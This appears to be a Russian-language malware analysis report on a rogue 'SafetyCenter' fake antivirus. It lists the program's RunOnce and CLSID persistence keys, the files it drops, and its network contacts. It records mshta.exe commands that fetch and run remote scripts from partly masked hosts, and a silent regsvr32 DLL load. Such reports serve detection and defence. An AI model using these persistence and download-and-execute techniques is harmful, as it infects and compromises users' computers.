Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'SafetyCenter' = '%PROGRAM_FILES%\SafetyCenter\start.exe'
- [<HKLM>\SOFTWARE\Classes\CLSID\{25ecc7c8-331f-4758-8371-1d34c1e6a983}\Shell\Open\Command] '' = '%PROGRAM_FILES%\SafetyCenter\protector.exe'
- '%TEMP%\~1.exe'
- '<SYSTEM32>\mshta.exe' http://ur###nam.net/8732489273.php
- '<SYSTEM32>\regsvr32.exe' /s 1.dll
- '<SYSTEM32>\mshta.exe' http://95.##1.27.154/install.php?id######
- ICQ.exe
- firefox.exe
- %PROGRAM_FILES%\SafetyCenter\uninstall.exe
- %PROGRAM_FILES%\SafetyCenter\new.exe
- <Текущая директория>\1.dll
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\8732489273[1].php
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\install[1].php
- %PROGRAM_FILES%\SafetyCenter\sound.wav
- %TEMP%\~1.exe
- %PROGRAM_FILES%\SafetyCenter\main.ico
- %PROGRAM_FILES%\SafetyCenter\start.exe
- %PROGRAM_FILES%\SafetyCenter\protector.exe
- 'localhost':1039
- 'ur###nam.net':80
- 'localhost':1037
- '95.##1.27.154':80
- ur###nam.net/8732489273.php
- 95.##1.27.154/install.php?id######
- DNS ASK ur###nam.net
- ClassName: 'EDIT' WindowName: '(null)'
- ClassName: 'MS_WINHELP' WindowName: '(null)'
- ClassName: 'TForm1' WindowName: 'Safety Center'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'